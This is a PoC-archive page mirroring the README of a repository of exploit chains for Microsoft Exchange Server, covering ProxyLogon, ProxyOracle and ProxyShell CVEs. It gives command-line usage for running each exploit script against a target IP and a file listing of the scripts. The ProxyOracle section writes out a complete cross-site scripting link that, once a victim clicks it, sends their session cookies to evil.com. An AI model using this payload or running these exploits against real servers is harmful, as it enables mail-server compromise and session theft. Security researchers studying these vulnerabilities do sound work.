Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-26855 PoC — Microsoft Exchange Server Remote Code Execution Vulnerability

Source
https://github.com/hosch3n/ProxyVulns
Associated Vulnerability
Title:Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)
Description:Microsoft Exchange Server Remote Code Execution Vulnerability
Description
[ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Fixed RawIdentity Bug Exploit. [ProxyOracle] CVE-2021-31195 & CVE-2021-31196 Exploit Chains. [ProxyShell] CVE-2021-34473 & CVE-2021-34523 & CVE-2021-31207 Exploit Chains.
Readme
# ProxyVulns

### ProxyLogon

`Usage: python3 26855.py 1.1.1.1`

![](img/26855.png)

### ProxyOracle

``` url
Once a victim clicks this link, evil.com will receive the cookies.

https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`X-AnonResource-Backend=@evil.com:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/any.skin`,{credentials:`include`});//
```

``` bash
pip3 install pycryptodome

Usage: python3 31196.py 1.1.1.1 'cadata=xxx; cadataTTL=yyy; ...'
```

![](img/31196.png)

### ProxyShell

``` bash
pip3 install pypsrp

Usage: python3 34473.py 1.1.1.1

Usage: python3 31207.py 1.1.1.1 [Local File Path] [UNC Absolute Path]
```

![](img/34473.png)

![](img/31207.png)

> Not working in some versions target(due to `/@gmail.com` path), maybe fix it later

### Others

- `Cookie: securitytoken=foobar`

- `/owa/calendar/foobar@exchange.local/foobar/owa14.aspx/.js`

## Reference

[ProxyLogon Vulnerability Analysis(Chinese)](https://hosch3n.github.io/2021/08/22/ProxyLogon%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)

https://docs.microsoft.com/en-us/exchange/architecture/mailbox-servers/recreate-arbitration-mailboxes?view=exchserver-2019

[ProxyOracle Vulnerability Analysis(Chinese)](https://hosch3n.github.io/2021/08/23/ProxyOracle%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)

https://github.com/mwielgoszewski/python-paddingoracle

[ProxyShell Vulnerability Analysis(Chinese)](https://hosch3n.github.io/2021/08/24/ProxyShell%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)
File Snapshot

 [4.0K]  /data/pocs/08c6cec7e4541827175f431705f14a280c214f0b
├── [9.2K]  26855.py
├── [5.5K]  31196.py
├── [5.9K]  31207.py
├── [7.1K]  34473.py
├── [4.0K]  img
│   ├── [1.8M]  26855.png
│   ├── [919K]  31196.png
│   ├── [1.6M]  31207.png
│   └── [1.1M]  34473.png
├── [1.5K]  README.md
└── [ 225]  users.txt

1 directory, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →